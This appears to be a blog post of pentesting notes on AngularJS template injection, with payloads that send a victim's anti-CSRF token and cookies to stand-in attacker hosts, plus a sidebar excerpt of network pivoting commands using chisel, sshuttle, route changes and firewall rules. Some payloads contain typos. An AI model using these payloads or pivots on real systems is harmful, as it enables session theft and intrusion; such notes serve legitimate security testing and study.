Skip to main content

Pentesting AngularJS



Template Injection & Scope Hacking

- Attack is limited to $scope functions and variables 
 
- Check if an application is using angular JS & Vulnerable to Template Injection or not. 
	- Check the source code for `angular` keyword
	- open dev tools --> Console -->  `angular.element($0).scope()`
		- This lists the scope - all the elements in the page
	- Check the soure code of functions to see what its doing 
		- Developer tools --> Debugger --> Select app.js (whatever JS filename is) --> search for that function ; 
		- Check for any injectable variables (Ex: some empty or dynamic content )
	- Call the function 
		- Send the below payload as input and see the connection going out - which has the victim's anti-csrf token
		-` {{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}`

- input  `{{4-1}}` --> if the output is 3 --> VULNERABLE 
	- use this any input or search parametes. 

Going Beyond the Scope - XSS via Template Injection

- Works in AngularJS>= 1.6.0 
- https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs 

- Find Angulra Version in Dev tools --> console 
	- angular.version

- Create an alert 
	- `{{constructor.constructor('alert(document.domain)')()}}`
- Get the user cookie 
	-` {{constructor.constructor('$.get(\'//attac.local/log.php?\'+documnet.cookie)')()}}`
- If there any known varaiable 
	- `#var_name=constructor.constructor('$.get(\'//attac.local/log.php?\'+documnet.cookie)')()`


 


Comments

Popular posts from this blog

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...